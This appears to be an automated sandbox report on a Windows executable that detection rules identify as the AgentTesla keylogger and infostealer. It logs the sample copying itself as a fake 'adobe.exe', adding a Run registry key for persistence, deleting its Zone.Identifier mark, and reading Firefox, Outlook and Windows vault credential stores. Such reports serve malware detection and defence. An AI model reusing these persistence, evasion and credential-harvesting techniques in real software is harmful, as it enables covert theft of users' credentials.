                    Source: 1.2.ukBQ4ch2nE.exe.4511c80.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 1.2.ukBQ4ch2nE.exe.4511c80.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 1.2.ukBQ4ch2nE.exe.4511c80.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 1.2.ukBQ4ch2nE.exe.43db580.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 1.2.ukBQ4ch2nE.exe.43db580.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 1.2.ukBQ4ch2nE.exe.441d5b0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 1.2.ukBQ4ch2nE.exe.441d5b0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@2/2
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeFile created: C:\Users\user\AppData\Roaming\adobe\adobe.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMutant created: NULL
                    Source: ukBQ4ch2nE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: ukBQ4ch2nE.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: ukBQ4ch2nE.exeVirustotal: Detection: 75%
                    Source: ukBQ4ch2nE.exeReversingLabs: Detection: 73%
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeFile read: C:\Users\user\Desktop\ukBQ4ch2nE.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\ukBQ4ch2nE.exe "C:\Users\user\Desktop\ukBQ4ch2nE.exe"
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeProcess created: C:\Users\user\Desktop\ukBQ4ch2nE.exe "C:\Users\user\Desktop\ukBQ4ch2nE.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeProcess created: C:\Users\user\Desktop\ukBQ4ch2nE.exe "C:\Users\user\Desktop\ukBQ4ch2nE.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: ukBQ4ch2nE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: ukBQ4ch2nE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: ukBQ4ch2nE.exeStatic PE information: 0x9E6E088B [Wed Mar 25 00:27:55 2054 UTC]
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 2_2_00B90C55 push edi; retf 2_2_00B90C7A
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeCode function: 2_2_0663FBD1 push eax; ret 2_2_0663FBDD
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 5_2_013A0C55 push edi; retf 5_2_013A0C7A
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 5_2_013AEED0 pushad ; ret 5_2_013AEED1
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 5_2_06C68068 push esp; iretd 5_2_06C68071
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_029CEED0 pushad ; ret 8_2_029CEED1
                    Source: ukBQ4ch2nE.exeStatic PE information: section name: .text entropy: 6.960335286336614
                    Source: adobe.exe.2.drStatic PE information: section name: .text entropy: 6.960335286336614

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeFile written: C:\Users\user\AppData\Roaming\Adobe\adobe.exeJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeFile created: C:\Users\user\AppData\Roaming\Adobe\adobe.exeJump to dropped file
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobeJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobeJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeFile opened: C:\Users\user\AppData\Roaming\adobe\adobe.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
